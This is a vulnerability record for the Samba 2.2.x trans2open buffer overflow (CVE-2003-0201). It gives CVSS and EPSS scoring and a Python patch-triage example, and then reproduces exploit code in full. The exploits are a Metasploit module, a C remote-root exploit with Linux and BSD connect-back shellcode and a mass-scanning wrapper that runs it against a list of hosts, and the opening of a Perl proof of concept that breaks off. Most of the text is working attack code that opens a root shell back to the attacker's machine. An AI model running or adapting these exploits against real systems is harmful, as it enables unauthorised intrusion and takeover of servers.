Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
| V2 | 10 | | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 to 100%). The higher the score, the greater the probability that the vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile therefore compares one CVE's EPSS score against those of all other CVEs.
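As an added example (not part of this record), the following Python computes the percentile rank described above from a constructed set of EPSS scores and shows one way score, percentile and CVSS base score can be combined into a patching order. The CVE identifiers and score values are made up, and the triage thresholds are this example's own assumptions, not EPSS or NVD guidance.

```python
"""EPSS percentile rank and a CVSS/EPSS triage rule (added example).

The CVE ids and scores below are constructed for illustration; real EPSS
values come from the FIRST EPSS data feed.
"""
from bisect import bisect_left

# Constructed population of scored CVEs: id -> EPSS probability (0..1).
SAMPLE_EPSS = {
    "CVE-EXAMPLE-0001": 0.00042,
    "CVE-EXAMPLE-0002": 0.0031,
    "CVE-EXAMPLE-0003": 0.012,
    "CVE-EXAMPLE-0004": 0.089,
    "CVE-EXAMPLE-0005": 0.21,
    "CVE-EXAMPLE-0006": 0.47,
    "CVE-EXAMPLE-0007": 0.66,
    "CVE-EXAMPLE-0008": 0.83,
    "CVE-EXAMPLE-0009": 0.94,
    "CVE-EXAMPLE-0010": 0.975,
}


def epss_percentiles(scores: dict) -> dict:
    """Percentile rank of every CVE: the fraction of *other* CVEs whose EPSS
    score is strictly lower, following the definition in the text above
    (95th percentile = more likely to be exploited than 95% of other CVEs)."""
    ordered = sorted(scores.values())
    others = len(ordered) - 1
    if others <= 0:
        return {cve: 1.0 for cve in scores}
    # bisect_left returns how many scores are strictly below s
    return {cve: bisect_left(ordered, s) / others for cve, s in scores.items()}


def triage(cvss_base: float, epss_score: float, epss_percentile: float,
           cvss_floor: float = 7.0, epss_floor: float = 0.1,
           percentile_floor: float = 0.9) -> str:
    """Assumed triage rule (thresholds are this example's choice, not an
    EPSS/NVD recommendation): EPSS decides urgency, CVSS decides impact."""
    likely = epss_score >= epss_floor or epss_percentile >= percentile_floor
    severe = cvss_base >= cvss_floor
    if likely and severe:
        return "patch-now"
    if likely:
        return "patch-soon"
    if severe:
        return "schedule"
    return "backlog"


def rank_for_patching(cvss: dict, epss: dict) -> list:
    """Order CVEs by triage bucket, then by EPSS score, then by CVSS base score.
    Both dicts are keyed by CVE id and must cover the same ids."""
    order = {"patch-now": 0, "patch-soon": 1, "schedule": 2, "backlog": 3}
    pct = epss_percentiles(epss)
    rows = [(cve, triage(cvss[cve], epss[cve], pct[cve])) for cve in epss]
    rows.sort(key=lambda r: (order[r[1]], -epss[r[0]], -cvss[r[0]]))
    return rows


if __name__ == "__main__":
    # constructed CVSS base scores for the same ids
    cvss_demo = {cve: 5.0 for cve in SAMPLE_EPSS}
    cvss_demo["CVE-EXAMPLE-0001"] = 10.0
    for cve, bucket in rank_for_patching(cvss_demo, SAMPLE_EPSS):
        print(f"{cve}  epss={SAMPLE_EPSS[cve]:.5f}  cvss={cvss_demo[cve]:.1f}  {bucket}")
```

The point the numbers make is that a CVSS 10 entry with a negligible EPSS score lands in the "schedule" bucket while a medium-severity entry with a high EPSS score is promoted; percentile is only a rank within the population, so it moves whenever other CVEs are re-scored, which is why the absolute score is checked as well.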
Exploit Information
Exploit Database EDB-ID: 16880
Publication date: 2010-06-16 22:00 +00:00
Author: Metasploit
EDB Verified: Yes
##
# $Id: trans2open.rb 9552 2010-06-17 22:11:43Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba trans2open Overflow (*BSD x86)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on x86 Linux systems that do not
have the noexec stack option set.
},
'Author' => [ 'hdm', 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9552 $',
'References' =>
[
[ 'CVE', '2003-0201' ],
[ 'OSVDB', '4469' ],
[ 'BID', '7294' ],
[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
'StackAdjustment' => -3500
},
'Platform' => 'bsd',
'Targets' =>
[
# tested OK - jjd:
# FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8
[ 'Samba 2.2.x - Bruteforce',
{
'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack
'Offset' => 1055,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbfbffdfc },
'Stop' => { 'Ret' => 0xbfa00000 },
'Step' => 256
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def brute_exploit(addrs)
curr_ret = addrs['Ret']
begin
print_status("Trying return address 0x%.8x..." % curr_ret)
connect
smb_login
# This value *must* be 1988 to allow findrecv shellcode to work
# XXX: I'm not sure the above comment is true...
pattern = rand_text_english(1988)
# See the OSX and Solaris versions of this module for additional
# information.
# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
# (rpmbuild -bp ; edited/reran config.status ; make)
eip_off = target['Offset']
ptr_to_non_zero = target['PtrToNonZero']
# Stuff the shellcode into the request
pattern[0, payload.encoded.length] = payload.encoded
# We want test true here, so we overwrite conn with a pointer
# to something non-zero.
#
# 222 if (IS_IPC(conn)) {
# 223 return(ERROR(ERRSRV,ERRaccess));
# 224 }
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
# We want to avoid crashing on the following two derefences.
#
# 116 int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
# 117 {
# 118 int outsize = set_message(outbuf,0,0,True);
# 119 int cmd = CVAL(inbuf,smb_com);
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
# This stream covers the framepointer and the return address
#pattern[1199, 400] = [curr_ret].pack('N') * 100
pattern[eip_off, 4] = [curr_ret].pack('V')
trans =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
pattern
# puts "press any key"; $stdin.gets
sock.put(trans)
handler
disconnect
rescue EOFError
rescue => e
print_error("#{e}")
end
end
end
Exploit Database EDB-ID: 55
Publication date: 2003-07-12 22:00 +00:00
Author: Schizoprenic
EDB Verified: Yes
/*
* Mass Samba Exploit by Schizoprenic
* Xnuxer-Research (c) 2003
* This code just for education purpose
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>    /* strlen */
#include <unistd.h>    /* unlink */
#include <sys/stat.h>
int scan(char *fl, char *bind_ip);   /* defined below, called from main() */
void usage(char *s)
{
printf("Usage: %s \n",s);
exit(-1);
}
int main(int argc, char **argv)
{
printf("Mass Samba Exploit by Schizoprenic\n");
if(argc != 3) usage(argv[0]);
scan(argv[1], argv[2]);
return 0;
}
int scan(char *fl, char *bind_ip)
{
FILE *fp;
char buf[512];
char cmd[100];
int i;
struct stat st;
if((fp=fopen(fl,"r")) == NULL) {
fprintf(stderr,"File %s not found!\n", fl);
return -1;
}
while(fgets(buf,512,fp) != NULL)
{
if(buf[strlen(buf)-1]=='\n') buf[strlen(buf)-1]=0;
for (i=0;i<4;i++) {
/* bounded: a long host line must not overrun cmd[] */
snprintf(cmd, sizeof(cmd), "./smb %d %s %s", i, buf, bind_ip);
printf("\nTrying get root %s use type %d ...\n",buf,i);
system(cmd);
if (stat(".ROOT", &st) != -1) {
unlink(".ROOT");
break;
}
}
}
fclose(fp);
printf("\nMass exploiting finished.\n");
return 0;
}
/*
* Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003.
* Using connect back method and brute force mode.
* I just create & modify some code and ripped too :P
* Create on May, 12st 2003
*
* Thanks to eDSee (netric.org), Sambal is nice exploit bro...
* References: trans2root.pl, 0x333hate.c, sambal.c
* This code just for education purpose
*
* XNUXER RESEARCH LABORATORY
* Official Site: http://infosekuriti.com
* Contact Email: xnuxer@yahoo.com, xnuxer@hackermail.com
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char
linux_connect_back[] =
/* fork(), execve sh -c [client] [host to bounce to], term=xterm */
"\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
"\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
"\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
"\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"
/* connect back shellcode (port=0xb0ef) */
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
char
bsd_connect_back[] =
/* fork(), execve sh -c [client] [host to bounce to], term=xterm */
"\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
"\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
"\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
"\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"
/* connect back shellcode (port=0xb0ef) */
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
"\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
"\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
typedef struct {
unsigned char type;
unsigned char flags;
unsigned short length;
} NETBIOS_HEADER;
typedef struct {
unsigned char protocol[4];
unsigned char command;
unsigned short status;
unsigned char reserved;
unsigned char flags;
unsigned short flags2;
unsigned char pad[12];
unsigned short tid;
unsigned short pid;
unsigned short uid;
unsigned short mid;
} SMB_HEADER;
pid_t childs[50];
int LOOP = 1;
struct sockaddr_in serv_addr;
int sock_listen, client;
int exploit_pid;
int listen_pid;
int port_listen = 45295;
void
usage(char *prog)
{
int i;
fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n"
"Connect back method, Xnuxer-Labs, 2003.\n"
"Usage : %s \n"
"Targets:\n"
" 0 = Linux\n"
" 1 = FreeBSD/NetBSD\n"
" 2 = OpenBSD 3.0 and prior\n"
" 3 = OpenBSD 3.2 - non-exec stack\n\n", prog);
exit(1);
}
int
Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
{
/* ripped from no1 */
int flags;
int select_status;
fd_set connect_read, connect_write;
struct timeval timeout;
int getsockopt_length = 0;
int getsockopt_error = 0;
struct sockaddr_in server;
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
inet_pton(AF_INET, ip, &server.sin_addr);
server.sin_port = htons(port);
if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return -1;
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return -1;
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&connect_read);
FD_ZERO(&connect_write);
FD_SET(fd, &connect_read);
FD_SET(fd, &connect_write);
if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
if(errno != EINPROGRESS) {
close(fd);
return -1;
}
}
else {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
if(select_status == 0) {
close(fd);
return -1;
}
if(select_status == -1) {
close(fd);
return -1;
}
if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
getsockopt_length = sizeof(getsockopt_error);
if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
errno = ETIMEDOUT;
close(fd);
return -1;
}
if(getsockopt_error == 0) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
errno = getsockopt_error;
close(fd);
return (-1);
}
}
}
else {
close(fd);
return 1;
}
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
int
read_timer(int fd, unsigned int time_out)
{
/* ripped from no1 */
int flags;
int select_status;
fd_set fdread;
struct timeval timeout;
if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&fdread);
FD_SET(fd, &fdread);
select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);
if(select_status == 0) {
close(fd);
return (-1);
}
if(select_status == -1) {
close(fd);
return (-1);
}
if(FD_ISSET(fd, &fdread)) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
close(fd);
return 1;
}
}
int
write_timer(int fd, unsigned int time_out)
{
/* ripped from no1 */
int flags;
int select_status;
fd_set fdwrite;
struct timeval timeout;
if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&fdwrite);
FD_SET(fd, &fdwrite);
select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);
if(select_status == 0) {
close(fd);
return -1;
}
if(select_status == -1) {
close(fd);
return -1;
}
if(FD_ISSET(fd, &fdwrite)) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
close(fd);
return -1;
}
}
int
start_session(int sock)
{
char buffer[1000];
char response[4096];
char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
"\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x00;
netbiosheader->length = htons(0x2E);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x73; /* session setup */
smbheader->flags = 0x08; /* caseless pathnames */
smbheader->flags2 = 0x01; /* long filenames supported */
smbheader->pid = getpid() & 0xFFFF;
smbheader->uid = 100;
smbheader->mid = 0x01;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1,
sizeof(session_data1) - 1);
if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 50, 0) < 0) return -1;
memset(response, 0x00, sizeof(response));
if (read_timer(sock, 3) == 1)
if (read(sock, response, sizeof(response) - 1) < 0) return -1;
netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
//if (netbiosheader->type != 0x00) fprintf(stderr, "+ Received a non session message\n");
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
memset(buffer, 0x00, sizeof(buffer));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x00;
netbiosheader->length = htons(0x3C);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x70; /* start connection */
smbheader->pid = getpid() & 0xFFFF;
smbheader->tid = 0x00;
smbheader->uid = 100;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);
if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 64, 0) < 0) return -1;
memset(response, 0x00, sizeof(response));
if (read_timer(sock, 3) == 1)
if (read(sock, response, sizeof(response) - 1) < 0) return -1;
netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
if (netbiosheader->type != 0x00) return -1;
return 0;
}
int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{
char buffer[4000];
char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x90";
int i = 0;
unsigned long dummy = ret - 0x90;
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x04;
netbiosheader->length = htons(2096);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x32; /* SMBtrans2 */
smbheader->tid = 0x01;
smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data),
0x90, 3000);
buffer[1096] = 0xEB;
buffer[1097] = 0x70;
for (i = 0; i < 4 * 24; i += 8) {
memcpy(buffer + 1099 + i, &dummy, 4);
memcpy(buffer + 1103 + i, &ret, 4);
}
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1800, shellcode, strlen(shellcode));
if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
return 0;
}
return -1;
}
int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
char buffer[4000];
char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x90";
int i = 0;
unsigned long dummy = ret - 0x30;
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x04;
netbiosheader->length = htons(2096);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x32; /* SMBtrans2 */
smbheader->tid = 0x01;
smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data),
0x90, 3000);
for (i = 0; i < 4 * 24; i += 4)
memcpy(buffer + 1131 + i, &dummy, 4);
memcpy(buffer + 1127, &ret, 4);
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));
if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
return 0;
}
return -1;
}
void shell(int sock)
{
fd_set fd_read;
char buff[1024], *cmd="uname -a;id;\n";
int n;
send(sock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
void GoAway()
{
exit(0);
}
void start_listen()
{
FILE *fstat;
int cpid;
LISTENER:
bzero(&serv_addr, sizeof(serv_addr));
serv_addr.sin_family=2;
serv_addr.sin_addr.s_addr=0;
serv_addr.sin_port=htons(port_listen);
sock_listen=socket(2,1,6);
if(bind(sock_listen,(struct sockaddr *)&serv_addr,16))
{
port_listen++;
goto LISTENER;
}
if(listen(sock_listen,1))
{
perror("listen");
exit(1);
}
fprintf(stdout, "[+] Listen on port: %d\n",port_listen);
cpid = fork();
if (cpid) {
client=accept(sock_listen,0,0);
LOOP = 0;
kill(SIGUSR2, exploit_pid);
if (client > 0) {
fprintf(stdout, "[+] Yeah, I have a root ....!\n"
"------------------------------\n");
fstat=fopen(".ROOT", "a"); //needed by mass.c
fclose(fstat);
shell(client);
}
exit(0);
}
}
int
main (int argc,char *argv[])
{
char *shellcode = NULL;
int typeos = -1;
int port = 139;
int sock = 0;
int i = 0;
int status = 0;
int m = 0;
int ip1 = 0;
int ip2 = 0;
int ip3 = 0;
int ip4 = 0;
int sta = 0;
int STEPS = 512;
int ENDLOOP = 64;
char *desc;
unsigned long MAX_CHILDS = 40;
unsigned long ret = 0x0;
unsigned short int a_port;
struct sockaddr_in addr1;
struct hostent *he;
struct stat st;
if (argc != 4) usage(argv[0]);
typeos = atoi(argv[1]);
if (typeos > 3) {
fprintf(stdout, "Os type out of list!\n");
exit(1);
}
he = gethostbyname(argv[2]);
if (he == NULL) {
fprintf(stderr, "Unable to resolve\n");
return -1;
}
listen_pid = getpid();
start_listen();
exploit_pid = listen_pid + 1;
//fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid);
sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1;
linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2;
linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3;
linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4;
fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n",
ip1, ip2, ip3, ip4, port_listen);
a_port = htons(port_listen);
linux_connect_back[177]= (a_port) & 0xff;
linux_connect_back[178]= (a_port >> 8) & 0xff;
bsd_connect_back[168]= (a_port) & 0xff;
bsd_connect_back[169]= (a_port >> 8) & 0xff;
switch(typeos) {
case 0:
desc = "Linux";
ret = 0xc0000000;
shellcode = linux_connect_back;
break;
case 1:
desc = "FreeBSD/NetBSD";
ret = 0xbfc00000;
shellcode = bsd_connect_back;
break;
case 2:
desc = "OpenBSD 3.1 and prior";
ret = 0xdfc00000;
shellcode = bsd_connect_back;
break;
case 3:
desc = "OpenBSD 3.2 non-exec stack";
ret = 0x00170000;
shellcode = bsd_connect_back;
break;
}
fprintf(stdout, "[+] Target: %s\n", desc);
memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
addr1.sin_family = AF_INET;
addr1.sin_port = htons(port);
fprintf(stdout, "[+] Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr),
port);
fprintf(stdout, "[+] Please wait in seconds...!\n");
signal(SIGUSR2, GoAway);
for (i = 0; i < 50; i++) childs[i] = -1;
i = 0; m = 0;
while (LOOP) {
if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
fprintf(stderr, "[+] socket() error.\n");
exit(-1);
}
ret -= STEPS; i++;
if ((ret & 0xff) == 0x00 && typeos != 3) ret++;
m++;
//fflush(0);
//fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret, m);
usleep(150000);
switch (childs[i] = fork()) {
case 0:
if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
//fprintf(stderr, "[+] connect() error.\n");
close(sock);
exit(-1);
}
start_session(sock);
sleep(3);
if (typeos != 3) {
if (exploit_normal(sock, ret, shellcode) < 0) {
//fprintf(stderr, " -> Failed.\n");
close(sock);
exit(-1);
}
} else {
if (exploit_openbsd32(sock, ret, shellcode) < 0) {
//fprintf(stderr, " -> Failed.\n");
close(sock);
exit(-1);
}
}
sleep(5);
close(sock);
exit(0);
break;
case -1:
exit(-1);
break;
default:
if (i > MAX_CHILDS - 2) {
wait(&status);
i--;
}
break;
}
if (m == ENDLOOP) LOOP = 0;
}
if (stat(".ROOT", &st) != -1)
kill(SIGUSR2, listen_pid);
else {
fprintf(stdout, "[+] Dohh, exploit failed.\n");
close(client); close(sock_listen);
kill(listen_pid, SIGUSR2);
sleep(2);
exit(0);
}
}
// milw0rm.com [2003-07-13]
Exploit Database EDB-ID: 7
Publication date: 2003-04-06 22:00 +00:00
Author: H D Moore
EDB Verified: Yes
#!/usr/bin/perl
###############
##[ Header
# Name: trans2root.pl
# Purpose: Proof of concept exploit for Samba 2.2.x (trans2open overflow)
# Author: H D Moore <hdmoore@digitaldefense.net>
# Copyright: Copyright (C) 2003 Digital Defense Inc.
# trans2root.pl <options> -t <target type> -H <your ip> -h <target ip>
##
use strict;
use Socket;
use IO::Socket;
use IO::Select;
use POSIX;
use Getopt::Std;
$SIG{USR2} = \&GoAway;
my %args;
my %targets =
(
"linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
"solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
